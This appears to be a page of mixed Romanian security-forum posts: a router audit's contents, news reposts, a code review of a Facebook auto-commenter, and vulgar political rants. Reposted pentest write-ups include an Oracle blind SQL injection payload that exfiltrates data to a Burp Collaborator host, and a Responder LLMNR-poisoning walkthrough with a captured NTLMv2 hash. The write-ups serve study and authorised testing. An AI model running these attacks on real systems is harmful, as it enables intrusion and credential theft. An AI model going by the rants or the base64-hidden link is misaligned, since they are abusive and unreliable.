Leaderboard

Router-ul Connect Box de la UPC, cel putin al meu, este Compal CH7465LG, software version CH7465LG-NCIP-4.50.18.20-NOSH. M-am apucat de ceva teste pe el si se pare ca SEARCH-LAB a facut o analiza de securitate foarte detaliata, incluzand atat componentele software (network, software, web) cat si hardware, pe Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH. O scurta descriere puteti gasi aici, dar pierdeti toata distractia si informatia: https://www.exploit-db.com/exploits/40159/ Raportul complet, format PDF, este aici: http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf Daca nu v-am convins, uite asa arata cuprinsul: 1 Executive Summary............................................................................................................................ 5 2 Introduction ....................................................................................................................................... 8 2.1 Foreword ................................................................................................................................. 8 2.2 Scope ....................................................................................................................................... 8 2.3 Document overview ................................................................................................................ 8 2.4 Version history ........................................................................................................................ 9 3 Test Environment............................................................................................................................. 10 3.1 Samples and other deliveries................................................................................................ 10 3.1.1 Unique identification and version numbers..................................................................... 10 3.1.2 Design ............................................................................................................................... 10 3.1.3 Components...................................................................................................................... 12 3.1.4 Interfaces.......................................................................................................................... 16 3.2 Documentation and other information................................................................................. 18 3.2.1 Generic and chipset-specific information......................................................................... 18 3.2.2 ToE-specific information................................................................................................... 18 3.3 Tools and testing equipment................................................................................................. 19 3.3.1 Hardware tools ................................................................................................................. 19 3.3.2 Software tools................................................................................................................... 19 4 Security Evaluation........................................................................................................................... 20 4.1 External interfaces................................................................................................................. 20 4.1.1 Front panel buttons and LEDs........................................................................................... 20 4.1.2 RF cable interface with DOCSIS......................................................................................... 21 4.1.3 Telephone connectors...................................................................................................... 21 4.1.4 Ethernet interfaces........................................................................................................... 21 4.2 Internal interfaces................................................................................................................. 21 4.2.1 Flash interfaces................................................................................................................. 22 4.2.2 EEPROM interface............................................................................................................. 22 4.2.3 Local memory interface .................................................................................................... 22 4.2.4 PCIe ................................................................................................................................... 22 4.2.5 UART of the Wi-Fi SoC (J15).............................................................................................. 23 4.2.6 UART of the Main SoC (J23).............................................................................................. 23 4.3 System software.................................................................................................................... 23 4.3.1 Flash contents of the main SoC ........................................................................................ 23 4.3.2 Shells of Main SoC............................................................................................................. 25 4.3.3 Shell of Wi-Fi SoC.............................................................................................................. 28 4.3.4 Shell access in Main SoC ................................................................................................... 29 4.4 Security of the network interfaces........................................................................................ 30 4.4.1 Service discovery .............................................................................................................. 30 4.4.2 Web Server ....................................................................................................................... 33 4.4.3 Web GUI............................................................................................................................ 38 Project work ID: P15- 4.4.4 UPnP.................................................................................................................................. 50 4.4.5 SNMP ................................................................................................................................ 50 4.4.6 RPC.................................................................................................................................... 52 4.4.7 Wi-Free ............................................................................................................................. 57 4.5 Security of the sensitive assets ............................................................................................. 59 4.5.1 Web interface credentials................................................................................................. 59 4.5.2 Wi-Fi credentials............................................................................................................... 60 4.5.3 WPS................................................................................................................................... 60 4.5.4 Security of the backup/restore functionality.................................................................... 61 4.5.5 DOCSIS credentials............................................................................................................ 62 5 Conformance to Requirements........................................................................................................ 64 5.1 Security checklist................................................................................................................... 64 6 Evaluation Results............................................................................................................................ 68 6.1 Findings and recommendations............................................................................................ 68 6.1.1 Serial interface was open on the Main SoC...................................................................... 68 6.1.2 Serial interface was open on the Wi-Fi SoC...................................................................... 68 6.1.3 Bootloader menu was accessible on the Main SoC UART ................................................ 68 6.1.4 Bootloader menu was accessible on the Wi-Fi SoC UART................................................ 69 6.1.5 cbnlogin could cause arbitrary code execution................................................................ 69 6.1.6 Unnecessary services were running on the Main SoC...................................................... 69 6.1.7 Buffer overflow in the Web server HTTP version field ..................................................... 69 6.1.8 HTTPS support was disabled on the Web server.............................................................. 70 6.1.9 Hard-coded private key was used for HTTPS.................................................................... 70 6.1.10 Hard-coded private key could be downloaded from the Web interface without authentication............................................................................................................................... 70 6.1.11 HTTPS certificate could be used to impersonate any web site ........................................ 70 6.1.12 Sensitive information disclosure....................................................................................... 71 6.1.13 Unauthenticated remote DoS against the device............................................................. 71 6.1.14 Super and CSR users could not be disabled...................................................................... 71 6.1.15 Attacker could change first installation flag ..................................................................... 72 6.1.16 Password brute-force protection was not active ............................................................. 72 6.1.17 Password brute-force protection could be bypassed....................................................... 72 6.1.18 The user of the modem might steal or replace the DOCSIS credentials .......................... 72 6.1.19 Unauthenticated remote command injection in ping command..................................... 73 6.1.20 Authenticated remote command injection in tracert command ..................................... 73 6.1.21 Unauthenticated remote command injection in stop diagnostic command ................... 73 6.1.22 Remote DoS with stop diagnostic command.................................................................... 73 6.1.23 Buffer overflow in stop diagnostic command................................................................... 74 6.1.24 Authenticated remote command injection with e-mail sending function ....................... 74 6.1.25 Session management was insufficient.............................................................................. 74 6.1.26 CSRF protection could be bypassed.................................................................................. 75 6.1.27 Unauthenticated DoS against Wi-Fi setting modification ................................................ 75 6.1.28 Unauthenticated DoS against the Wi-Fi functionality ...................................................... 75 6.1.29 Unauthenticated changes in WPS settings....................................................................... 75 6.1.30 Unauthenticated local command injection with RPC on Main SoC.................................. 76 6.1.31 Unauthenticated local command injection with RPC on Wi-Fi SoC.................................. 76 6.1.32 Buffer overflow in the Wi-Fi SoC RPC implementation .................................................... 76 6.1.33 Hard-coded keys were used to encrypt the backup file ................................................... 77 6.1.34 UPC Wi-Free network interface was accessible on the Wi-Fi SoC.................................... 77 6.1.35 Backup/restore interface allowed remote reconfiguration without authentication....... 77 6.2 Risk Analysis .......................................................................................................................... 78 7 References........................................................................................................................................ 81 Appendix A Certificate used for HTTPS.............................................................................................. 82 Appendix B Private key used for HTTPS ............................................................................................ 83 Appendix C Serial console on J15 ...................................................................................................... 85 Appendix D Interactive shell on J15................................................................................................... 87 Appendix E Serial console on J23 ...................................................................................................... 91 Appendix F Interactive boot shell on J23 .......................................................................................... 96

Care vreti sa va jucati cu el, il puteti rula direct cu quemu (se poate instala pe linux, bsd, mac os x, windows). Pentru instalare, trebuie sa faceti intai o imagine cu quemu pe care o veti folosi ca hdd (storage). Pentru mai multe optiuni, consultati sfantul manual Quick test pe mac os x: aelius@macbook:~$ sudo su - Password: root@macbook:~# port search qemu qemu @2.7.0 (emulators) Emulator for various architectures qemu-usermode @0.9.0 (emulators) x86 and PowerPC Emulator Found 2 ports. root@macbook:~# port install qemu ---> Computing dependencies for qemu ---> Dependencies to be installed: curl libpixman libusb python27 db48 python2_select python_select texinfo perl5.24 gdbm .................. ---> Fetching distfiles for qemu ---> Attempting to fetch qemu-2.7.0.tar.bz2 from https://distfiles.macports.org/qemu ---> Verifying checksums for qemu ---> Extracting qemu ---> Applying patches to qemu ---> Configuring qemu ---> Building qemu ---> Staging qemu into destroot ---> Installing qemu @2.7.0_0+cocoa+target_i386+target_x86_64+usb ---> Activating qemu @2.7.0_0+cocoa+target_i386+target_x86_64+usb ---> Cleaning qemu ---> Updating database of binaries ---> Scanning binaries for linking errors ---> No broken files found. root@macbook:~# logout aelius@macbook:~$ cd Work/ aelius@macbook:~/Work$ wget http://download.minix3.org/iso/minix_R3.3.0-588a35b.iso.bz2 --2017-01-04 00:18:36-- http://download.minix3.org/iso/minix_R3.3.0-588a35b.iso.bz2 Resolving download.minix3.org (download.minix3.org)... 66.147.238.215 Connecting to download.minix3.org (download.minix3.org)|66.147.238.215|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 301656556 (288M) [application/octet-stream] Saving to: 'minix_R3.3.0-588a35b.iso.bz2' minix_R3.3.0-588a35b.iso.bz2 4%[====> ] 13.64M 4.94MB/s 2017-01-04 00:19:14 (7.59 MB/s) - 'minix_R3.3.0-588a35b.iso.bz2' saved [301656556/301656556] aelius@macbook:~/Work$ bunzip2 minix_R3.3.0-588a35b.iso.bz2 aelius@macbook:~/Work$ qemu-system-i386 -cdrom minix_R3.3.0-588a35b.iso

Cateva sfaturi: - nu mai comenta fiecare linie de cod. - fiecare metoda ar trebui sa contina docstring. - numele functiilor ar trebui sa fie denumite astfel: getLastPost -> get_last_post (snake_case) - regula de mai sus se aplica si la numele variabilelor - in jurul operatorilor ar trebui sa existe un singur spatiu - cel mai important e ca (,) codul scris sa fie consistent. Foloseste ori double-quotes ori single-quotes cand definesti un string. - nu creea variabile inutile, mai ales daca sunt folosite o singura data - daca variabilele sunt folosite intr-o singura functie, nu are rost sa le faci globale. Fa-le argumente sau defineste-le in functia respectiva. - if __name__ == '__main__' Cum as face eu: from facepy import GraphAPI personal_access_token = '' graph = GraphAPI(personal_access_token) def get_last_post(page_id): """ Ce face functia asta ? """ a = graph.get(path='{0}/posts?limit=1'.format(page_id)) return a['data'][0]['id'] def comment(post_id, text_to_comment): """ Ce face functia asta ? """ graph.post( path='{0}/comments'.format(post_id), message=text_to_comment ) def main(page_to_check='', comment_to_post='This comment was posted using stalkpy'): a = get_last_post(page_to_check) while True: if a == get_last_post(page_to_check): print('No new posts Lord Sam') else: comment(get_last_post(page_to_check), comment_to_post) print('Commented on a new post Lord Sam') a = get_last_post(page_to_check) if __name__ == '__main__': main() Mai multe despre styleguide gasesti aici.

PHP Secure Configuration Checker Check current PHP configuration for potential security flaws. Simply access this file from your webserver or run on CLI. Author This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks. Link: https://github.com/sektioneins/pcc

Din CV-ul ministrului de la energie, Toma Petcu. Pe langa altele, competenta de "Bine" in Acrobat Reader =)))))))))))))))) Muie Rromania!

EXCLUSIV. După chiul, shopping şi fumat în birou, Corina Crețu șochează iar. Comisarul european dă vina pe hackeri, abia după ce România liberă i-a semnalat că pe contul său de Twitter sunt filme porno de Adrian Bărbulescu , 04 ianuarie 2017 - stire actualizata la ora 08:41, 04 ianuarie 2017 EXCLUSIV. După chiul, shopping şi fumat în birou, Corina Crețu șochează iar. Comisarul european dă vina pe hackeri, abia după ce România liberă i-a semnalat că pe contul său de Twitter sunt filme porno Comisarul european pentru Politici Regionale, Corina Creţu, propulsată în această poziţie de Victor Ponta şi PSD, este pe cale să fie în centrul unui nou scandal monstru, când abia se risipiseră ecourile dezvăluirilor făcute în decembrie 2015 de jurnalistul Ryan Heath de la Politico Europe. UPDATE Corina Creţu: contul meu a fost spart Abia după ce România liberă i-a atras atenţia oficial asupra faptului că pe contul său de Twitter sunt postate filme porno, comisarul european Corina Creţu a reacţionat. „Contul meu a fost spart. Vă rog ignoraţi tweet-urile, RT-urile şi like-urile postate în ultimele 48 de ore. Lucrăm pentru a rezolva această problemă cât mai repede posibil. Scuze” (My account has been hacked. Pls disregard tweets, RTs &likes posted in the last 48 hrs. We are working on solving issue asap. Apologies), a scris Creţu chiar pe contul său de Twitter pe care-i sfătuia pe urmăritori să-l ignore. Apoi, a postat un mesaj similar şi în limba română: "Contul meu a fost spart & accesat ilegal. Ignorați mesajele & like-urile din ultimele 48 ore. Echipa mea lucrează la remedierea situației". Întrebarea se pune dacă trebuia să ignorăm şi aceste mesaje, aşa cum ne îndemna Corina Creţu. Dacă atunci scandalul era centrat pe chiul, shopping şi fumat în biroul de la Comisia Europeană, acum are accente pornografice de-a dreptul. Comisarul european a dat like, de pe contul său oficial de Twitter, unor postări XXX, pe care, din motive lesne de înţeles, nu le putem publica decât blurate. Chiar sistemul de operare Windows îi avertizează pe utilizatori, înainte de a deschide linkul, că “următorul conţinut media poate conţine material sensibil”. Nu numai că este sensibil acest conţinut, ci el este pornografic de-a dreptul. Twitter funcţionează similar cu Facebook, adică în momentul în care o persoană pe care o urmăreşti (i-ai dat “follow”) dă like unei postări, vei putea vedea atât postările proprii ale acesteia, cât şi cele cărora le-a dat like. Astfel, toţi cei 15.200 de urmăritori ai Corinei Creţu de pe reţeaua de socializare au putut viziona filmuleţele pornografice cărora le-a dat like comisarul european. Şi nu este vorba de un cont de Twitter oarecare, al unei persoane private, ci de unul oficial în calitate de comisar european, căruia reţeaua de socializare condusă de Jack Dorsey i-a alocat şi o bifă albastră, “privilegiu” acordat persoanelor publice cunoscute, care certifică autenticitatea contului. Mai trebuie menţionat faptul că la nivelul instituţiilor europene canalul oficial de comunicare este Twitter, şi nu Facebook. Articol complet: http://www.romanialibera.ro/actualitate/fapt-divers/exclusiv--comisarul-european-corina-cretu-da-like-uri-la-filme-porno--pe-contul-sau-oficial-de-twitter-437210

Imi place cand garaj da sfaturi de pep8.

https://republica.ro/ia-de-la-dragnea https://www.facebook.com/Adevarul/videos/10154294688426243/ http://www.hotnews.ro/stiri-esential-21508686-catalin-tolontan-primul-demis-dupa-incendiul-colectiv-ajuns-acum-ministrul-tineretului-sportului.htm Prim-ministru un muist SRI-ist care-i limbist la Dragnea cu balerina de consilier. Olguta de la munca parca era cea acuzata ca in campanie a fortat oameni de afaceri sa faca sponsorizari si culmea ca probele cica au fost obtinute ilegal si i-a fost incalcat dreptul la aparare. La economie Petrescu de la Posta parca era cel care isi daduse prima de 30k euro de la companie de stat in pierdere. La justitie, inteligenta lumii care a facut in 4 ani cat altii intr-o viata: in timp ce era deputat 2004-2008 (care deh, vorba aia, e job full-time) a terminat 3 x cursuri postuniversitare + 2 masterate + 1 doctorat Si lista poate continua... Muie Rromania si celor care aveti oportunitatea sa plecati si nu o faceti (sadomasochisti)! P.S. - ar trebui pus la intrare pe forum, celor cu IP de Rromania un mesaj de reminder/acknowledgement: "Da, sunt inca aici, sunt inca bou"

RubyFu Rubyfu, where Ruby goes evil! This book is a great collection of ideas, tricks and skills that could be useful for Hackers. It's a unique extraction reference, summarizes a lot of research and experience in order to achieve your w00t in shortest and smartest way. Rubyfu is where you'll find plug-n-hack code, Rubyfu is a book to use not only to read, it's where ruby goes evil. Who should read this book? Ideally, Hackers!; Those who have enough experience to hack our world and have at least basics in Ruby programming language. To get the best benefits of the book, open Rubyfu.net and pin its browser tab; Use irb/pry as interpreter to run the code or run it as script; Enhance the code to fit your needs and yeah, tweet the code and its output to @Rubyfu to share it with our awesome community. Organization of the book Module 0x0 | Introduction Module 0x0 is just a smooth start for you, whether you're a reader, writer, hacker or someone came to say hi. In this module you'll find a great start for you as a contributor, where all kinds of contributions are welcome starting from proofreading ending to topic writing. Module 0x1 | Basic Ruby Kung Fu Module 0x1 is an awesome collection of the most commonly needed String manipulation, extraction and conversion. Dealing with real cases that you might face during your hack. Dealing with encoding and data conversion could be trivial or complex topic and here we don't care, we'll solve it. Module 0x2 | System Kung Fu Module 0x2 digs more in system hacking, where the system command, file manipulation, cryptography and generating the common hashes are needed. Getting bind and reverse shell with really simple ways requires skill you need no doubt. Almost all Linux systems are shipped-up with ruby and if it doesn't?, no problem we'll get rid of it. Module 0x3 | Network Kung Fu Module 0x3 dives deeper in the network sockets, protocols, packet manipulation, more service enumeration ways and gives us more hacky and awesome code to get the job done. Working with network protocols need a deeper knowledge of how these protocols work in order to exchange understandable data and yeah, we'll figure it out right here. Module 0x4 | Web Kung Fu Module 0x4 web is the most common place to share information, however, it's a more delicious place to hack. Dealing with web known with its uniqueness for dealing with many and many technologies in one page only. Here we'll know how to deal with GET, POST requests, web services, databases, APIs and manipulating the browser to make it our soldier. Module 0x5 | Exploitation Kung Fu Module 0x5 whatsoever the vulnerability was, remote (FTP, IMAP, SMTP, etc.) or local (file format, local system) you'll need to know how to build fuzzers and skeleton exploit for that. If you get there you'll need a simple, clean and stable way to build your exploit. Here you'll know how to build your fuzzer, exploit and porting your exploit to Metasploit and how to write your own Metasploit modules too. Module 0x6 | Forensic Kung Fu Module 0x6 whoever you're, good or bad guy you'll need forensic skills in your hack and/or investigation. Here you'll learn more how to deal with registry extracting browsers' information and much more. Link: https://www.gitbook.com/book/rubyfu/rubyfu/details

bah sa tin si eu mousu deasupra unui link sunt in stare..

aHR0cDovL3guY28vNmxuMDM= Uite-l aici, te duce direct la site

normal ca sunt , daia vreau sa invat:)

Hacker held open MongoDB databases for ransom January 4, 2017 By Pierluigi Paganini A mysterious hacker is breaking into unprotected MongoDB databases, stealing their content, and asking for a ransom to return the data. Co-founder of the GDI Foundation Victor Gevers is warning of poor security for MongoDB installations in the wild. The security expert has discovered 196 instances of MongoDB that were wiped by crooks and being held for ransom. A hacker who goes by online moniker Harak1r1 is demanding 0.2 BTC, roughly $200 at the current exchange, in order to restore the installation. The crooks also request system administrators to demonstrate the ownership of the installation through email. It seems that the hacker is focusing on open MongoDB installations, likely using a search engine like Shodan. On December 27, Gevers discovered a MongoDB server that was left accessible without authentication through the Internet. “Unlike other instances he discovered in the past, this one was different. When he accessed the open server, instead of looking at the database’s content, a collection of tables, Gevers found only one table, named “WARNING”. ” reads a blog post published on bleepingcomputer.com. The attacker accessed the open MongoDB database, exported its content, and replaced all data with a table containing the following code: { "_id" : ObjectId("5859a0370b8e49f123fcc7da"), "mail" : "harak1r1@sigaint.org", "note" : "SEND 0.2 BTC TO THIS ADDRESS 13zaxGVjj9MNc2jyvDRhLyYpkCh323MsMq AND CONTACT THIS EMAIL WITH YOUR IP OF YOUR SERVER TO RECOVER YOUR DATABASE !" } “I was able to confirm [this] because the log files show clearly that the date [at which] it was exported first and then the new database with tablename WARNING was created,” Gevers told BleepingComputer. “Every action in the database servers was being logged.” The expert notified victims their database were hacked: “Criminals often target open databases to deploy their activities like data theft/ransom. But we also have seen cases were open servers like these are used for hosting malware (like ransomware), botnets and for hiding files in the GridFS,” he wrote in the notification letter sent to the victims. Querying Google for the hacker’s email address and Bitcoin address it is possible to verify that many other users were victims of the same attacker.Gevers suggests to block access to port 27017 or limit access to the server by binding local IPs in order to protect the MongoDB installations. MongoDB admins could also restart the database with the “–auth” option, after they’ve assigned users access. Below other tips useful for MongoDB admins: Check the MongDB accounts to see if no one added a secret (admin) user. Check the GridFS to see if someone stored any files there. Check the logfiles to see who accessed the MongoDB (show log global command). In December 2015, the popular expert and Shodan creator John Matherly found over 650 terabytes of MongoDB data exposed on the Internet by vulnerable databases. Other clamorous cases of open MongoDB exposed on the Internet were found by the researcher Chris Vickery. In December 2015 the security expert Chris Vickery discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users. Pierluigi Paganini (Security Affairs – databases , hacking) Sursa: http://securityaffairs.co/wordpress/55018/cyber-crime/mongodb-hacked.html

VMWare has released a security advisory VMSA-2015-0009 that address a critical deserialization vulnerability. A deserialization vulnerability involving Apache Commons-collections and a specially constructed chain of classes exists. Successful exploitation could result in remote code execution, with the permissions of the application using the Commons-collections library. source: VMSA-2015-0009 | United States

Beyond detection: exploiting blind SQL injections with Burp Collaborator January 3, 2017 It’s been a steady trend that most of our pentest projects revolve around web applications and/or involve database backends. The former part is usually made much easier by Burp Suite, which has a built-in scanner capable of identifying (among others) injections regarding latter. However, detection is only half of the work needed to be done; a good pentester will use a SQL injection or similar database-related security hole to widen the coverage of the test (obviously within the project scope). Burp continually improves its scanning engine but provides no means to this further exploitation of these vulnerabilities, so in addition to manual testing, most pentesters use standalone tools. With the new features available since Burp Suite 1.7.09, we’ve found a way to combine the unique talents of Burp with our database exploitation framework, resulting in pretty interesting functionality. Many servers – including web applications and custom application APIs – make use of database backends, usually manipulated through the use of SQL. SQL injections were part of this game since the beginning, and although there are some specialized tools for exploiting such vulnerabilities, we found that sometimes simpler tools result in more productivity, thus Duncan was born, making exploiting SQL injection easier in many cases. This includes cases when the response from the server can be interpreted as two distinct values or some side channel (usually timing) must be used – this is usually called blind and time-based SQL-injection, respectively. However, there are other side channels as well, which were not as widely used. When PortSwigger announced Burp Collaborator in April 2015, it was a game changer, since it made detecting out-of-band interactions possible. It did so by running several servers (DNS, HTTP, HTTPS, and later SMTP, IMAP and POP3) under its own domain and inserting unique subdomains (such as rvqhg498gxa339ere9i1lby1dsji77.burpcollaborator.net) into the payloads sent to the server and monitoring the aforementioned servers for any requests that refer to these subdomains. This makes for a much faster side channel than timing (and when delays cannot be introduced, this is the only side channel), so a few months later the Scanner engine started using it as well. I made an inquiry about the possibility of 3rd party tools making use of Collaborator in May 2016, and they already hinted in their response to opening it to developers. In October, they kept their promise and finally added an official Collaborator API. However, this API is only available within Burp, and Duncan was not something I wanted to port to fit inside Burp – even though Burp supports plugins written in Python and Ruby, these use Jython and JRuby, which might lead to some unexpected complications. So I set out to create a universal extension that would create a bridge between the Burp Collaborator and any external program. Since Burp runs on multiple platforms, and such a bridge is useful only if it can be easily called from multiple programming languages, I decided to use MessagePack over TCP – for security reasons, it binds to localhost only on port 8452. The GitHub repository contains source code for the Burp Extender written in plain Java (2 simple classes), source code for a minimal example client in Python, and the full textual description of the protocol in the README file. Although compiling the code is pretty straightforward, a compiled JAR file can be downloaded from the releases page on GitHub. Right now it has no GUI, it binds to the hardcoded port – however, it’s MIT licensed, so pull requests are welcome. With this tool in hand, Oracle exploitation can be made much easier. As the Oracle page in our long-time reference by pentestmonkey describes, time-based injection is not that easy in Oracle, as DBMS_LOCK.SLEEP can’t be embedded into SELECT statements, other solutions require UTL_INADDR, URL_HTTP and similar. However, as Burp developers wrote, “they all require assorted privileges that we might not have”. Nevertheless, this same blog post also described an XXE vulnerability in Oracle that could be abused as a side channel when combined with Collaborator. With these in hand, the following Duncan class could be constructed: tpl = """'||(SELECT CASE WHEN ASCII(SUBSTR(({s._query}),{s._pos},1))<{guess} \ THEN extractValue(XMLType('<?xml version="1.0" encoding="UTF-8"?>\ <!DOCTYPE poc [ <!ENTITY % s2 SYSTEM "http://{payload}/">%s2;]>'),'/l') \ ELSE '' END FROM dual)||'""" class OracleDuncan(duncan.Duncan): def decide(self, guess): c = Client() payload = c.generate_payload(include_location=True) requests.post(url, data={'q': tpl.format(s=self, guess=guess, payload=payload)}, allow_redirects=False) return c.fetch_collaborator_interactions_for(payload) The template takes the guess in Duncan and based on whether it evaluates to true or false, it invokes an XML operation that signals the Collaborator if and only if the expression was true. The Client class comes from the Python example client, url contains the target web application, and data is sent in the parameter named q within the URL-encoded POST body. Since the Duncan framework that calls the decide method only tests whether the return value is “truthy”, we can return the list of collaborator interactions directly, since a list in Python is considered “truthy” if and only if it’s not empty – which in this case means that there was at least one Collaborator interaction with the unique payload used in the injected XML. This method is not only faster than traditional time-based exploitation (which involves intentional delays on the server), but also allows for multithreaded operations, as all requests are independent with their unique tokens in the payload. Below is an example using Duncan with the above class to extract the name of the database user. $ time python run_duncan.py --query 'SELECT user FROM dual' \ --charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \ --use poc.OracleDuncan --threads 1 VSZA 5,33s user 0,03s system 27% cpu 19,518 total $ time python run_duncan.py --query 'SELECT user FROM dual' \ --charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \ --use poc.OracleDuncan --threads 2 VSZA 5,50s user 0,04s system 38% cpu 14,459 total $ time python run_duncan.py --query 'SELECT user FROM dual' \ --charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \ --use poc.OracleDuncan --threads 5 VSZA 5,54s user 0,07s system 50% cpu 11,165 total As it can be seen above, 2 threads improved the runtime by 25%, while 5 threads resulted in a more than 40% improvement over the single-threaded version. In the test setup, raising the number of threads above 5 did not result in any measurable speedup, however, this could be attributed to the nature of the test service. We hope that releasing our Burp Extender plugin will enable bridging other great tools with Collaborator, thus resulting in successful exploitation in cases where a vulnerability was previously thought to be only exploitable by traditional blind techniques, widening the coverage of the pentest. Happy hacking! Thanks to József Marton for providing an Oracle Database account for this post. Sursa: https://blog.silentsignal.eu/2017/01/03/beyond-detection-exploiting-blind-sql-injections-with-burp-collaborator/

What is LLMNR & WPAD and How to Abuse Them During Pentest ? December 20, 2016 Mucahit Karadag In internal penetration tests, we simulate attacks that can be performed against on misconfigured services and protocols on network-level.These attacks are mostly caused by the fact that mechanisms such as Address Resolution Protocol (ARP), Dynamic Host Configuration Protocol (DHCP), and Domain Name System (DNS) are not configured properly.One of the most important attacks that can be encountered is undoubtedly Man-in-the-Middle. It allows access to sensitive information by listening to network traffic or manipulating the target to be accessed. Security measures against this attack can be taken on network equipment such as routers and switches. However, due to the inherent weaknesses of some protocols, we can perform the same attack with different methods. For this reason, the main theme of this article will be Man-in-the-Middle attacks against LLMNR, NetBIOS and WPAD mechanisms. Before begin, I would like to explain how the computers have Windows operating system communicate with each other in the same network and perform name resolution. This process proceed with some steps as follows: Hosts file in the file system is checked In its configuration files, inquires about the system information that it wants to reach. At the same time, it checks whether the device to accessed is itself. Configuration files are located in C:\Windows\System32\drivers\etc Check the local DNS Cache First of all cache is checked. If the information for the device to be accessed is exists in the cache, this information is used. The DNS cache can be learned with the ipconfig /displaydns command. Send query to DNS If the computer does not find any information from the configuration files about the device that it wants to access, it sends a query to the DNS server on the local network. Send the LLMNR query LLMNR is a protocol that is processed when the DNS server fails in name resolution. Send the NetBIOS-NS query It works in the “Session” layer of OSI Model. NetBIOS is an API, not a protocol, used communicate between Windows operating systems. The NetBIOS name of the computer is the same as the computer name. What is LLMNR and NetBIOS-NS? LLMNR (Link Local Multicast Name Resolution) and NetBIOS-NS (Name Service) are two components that Windows operating systems use for name resolution and communication. LLMNR has been used for the first time with Windows Vista operating system and is seen as the continuation of NetBIOS-NS service. In cases where the DNS server fails in name resolution queries, these two services are continued to name resolution. The LLMNR and NetBIOS-NS services attempt to resolve queries that the DNS server can not answer. In fact, this is the form of cooperation between Windows operating system computers. The LLMNR protocol is served by the link-scope multicast IP address 224.0.0.252 for IPv4 and from FF02:0:0:0:0:0:1:3 for IPv6. It performs own operations via 5355 TCP/UDP port. For example, while trying to ping to test.local that is not on the network, the first query goes to the DNS server. If the DNS server can not resolve this domain name, the query will be redirected to the LLMNR protocol. LLMNR is not an alternative to the DNS protocol; It is an improved solution for situations where DNS queries fail. It is supported by all operating systems marketed after Windows Vista. NetBIOS is an API that the systems in the local network use to communicate with each other. There are three different NetBIOS services. Name Service, it uses UDP 137 port for use for name registration and name resolution. Datagram Distribution Service, it uses UDP 138 port for connectionless communication. Session Service, It performs operations on the TCP 139 port for connection-oriented communication. The LLMNR protocol is used after the unsuccessful DNS query because the name resolution will be applied with the sort I share at the beginning of the article. And then a NetBIOS-NS packet, which is a broadcast query, is included in the traffic. Theoretically, these seemingly innocuous and functional systems have no protection against Man-in-the-Middle attacks on the local network. An attacker can obtain sensitive data such as username and password hash with successful attacks. Capture the NTLMv2 hash by manipulating the traffic Main scenario will be proceed as shown in below graphic: The victim will try to connect to the file sharing system, named filesrvr, which he typed incorrectly. The name resolution, which will be performed with the steps we mentioned earlier, will be questioned on the victim’s computer first. In step 2, because of the DNS Server does not have a corresponding record, the name of the system is sent as LLMNR, NetBIOS-NS query. The attacker listens to network traffic, catches name resolution query. Ze tells to victim that ze is the one who victim look for. (filsrvr) The attacker will listen to the broadcast and respond to all LLMNR and NetBIOS-NS queries. In this way, it is possible to manipulate traffic with a fake session and obtain username and password hashes. There are different tools to do this attack. Responder is developed by SpiderLabs. (We will use this tool.) The llmnr_response is a module in the Metasploit Framework MiTMf We start listening to the network traffic by specifying which network interface will be listened by the responder. root@kali:~# responder -i 10.7.7.31 NBT Name Service/LLMNR Responder 2.0. Please send bugs/comments to: lgaffie@trustwave.com To kill this script hit CRTL-C [+]NBT-NS, LLMNR & MDNS responder started [+]Loading Responder.conf File.. Global Parameters set: Responder is bound to this interface: ALL Challenge set: 1122334455667788 WPAD Proxy Server: False WPAD script loaded: function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';} HTTP Server: ON HTTPS Server: ON SMB Server: ON SMB LM support: False Kerberos Server: ON SQL Server: ON FTP Server: ON IMAP Server: ON POP3 Server: ON SMTP Server: ON DNS Server: ON LDAP Server: ON FingerPrint hosts: False Serving Executable via HTTP&WPAD: OFF Always Serving a Specific File via HTTP&WPAD: OFF Our victim attempt to connect filesrvr share And we are getting SMB-NTLMv2 Hash! LLMNR poisoned answer sent to this IP: 10.7.7.30. The requested name was : filesrvr. [+]SMB-NTLMv2 hash captured from : 10.7.7.30 [+]SMB complete hash is : Administrator::PENTESTLAB:1122334455667788:E360938548A17BF8E36239E2A3CC8FFC:0101000000000000EE36B4EE7358D201E09A8038DE69150F0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C00080030003000000000000000000000000030000056A8A45AB1D3338B0049B358B877AEEEE1AA43715BA0639FB20A86281C8FE2B40A0010000000000000000000000000000000000009001A0063006900660073002F00660069006C00650073007200760072000000000000000000 NBT-NS Answer sent to: 10.7.7.30. The requested name was : TOWER As we know NTLMv2 hashes can not be used directly for attacks Pass the Hash attack. Thus we need to perform password cracking attack in order to get plain-text password from out of captured hash. There are several tools for hash cracking; John the Ripper, Hashcat, Cain&Abel, Hydra etc. We will use hashcat to crack the NTLMv2 hash that we got from Responder. The Responder tool keeps the hash values it detects under the /usr/share/responder directory. root@kali:/usr/share/responder# ls *30* SMB-NTLMv2-Client-10.7.7.30.txt The NTLMv2 hash we obtained is as follows, root@kali:/usr/share/responder# cat SMB-NTLMv2-Client-10.7.7.30.txt 